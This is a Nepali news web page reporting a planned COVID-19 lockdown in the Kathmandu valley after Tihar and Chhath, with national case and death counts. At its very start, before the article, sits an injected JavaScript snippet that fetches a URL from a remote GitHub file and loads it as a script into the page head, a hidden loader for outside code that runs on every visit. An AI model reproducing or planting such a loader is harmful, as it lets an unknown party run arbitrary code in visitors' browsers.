;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); तिहार र छठ लगत्तै लकडाउन हुने – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • तिहार र छठ लगत्तै लकडाउन हुने
जुनेली बिशेष

तिहार र छठ लगत्तै लकडाउन हुने

कात्तिक २७,

काठमाडौ । नेपालमा नजिकिएको तिहार,छठ, नेपालसम्वत् लगत्तै कडा निषेधाज्ञा लागु हुने भएको छ ।

बुधबार काठमाडौंमा काठमाडौं, भक्पुर र ललितपुरका प्रमुख जिल्ला अधिकारी, सिसिएमसिका पदादीकाररी सम्मेलित् छलफलमा चाडपर्व लगत्तै लक्डाउन गर्ने विषयमा ५ घण्टा लामो छलफल भएको उपत्यका मेयर फोरमका सचिव मदनसुन्दर श्रेष्ठले जानकारी दिए । उनका अनुसार कोरोना भाइरस संक्रमण रोकथाम नियन्त्रण समितिमा बुधबार सो छलफल भएको र सिसियमसिलाई निषेधाज्ञा लागू गर्न आग्रह गरेको हो ।

काठमाडौं उपत्यकासहित देशैभरीमा कोरोना संक्रमण बढेको भन्दै त्यसलाई नियन्त्रणमा लिनको लागि यस्तो निर्षकर्श निकालेको उनले बताए । हाल देशभरी संक्रमितको संख्या २ लाख नाघेको छ । भने ११ सय ७४ जनाको मृत्यु भएको छ । त्यस्तै नेपालमा डिस्चार्ज हुनेको संख्या १ लाख ६२ हजार २४३ पुगेको छ । सक्रिय संक्रमितको संख्या ३८ हजार ९१२ पुगेको छ ।

फेसबुक प्रतिक्रियाहरु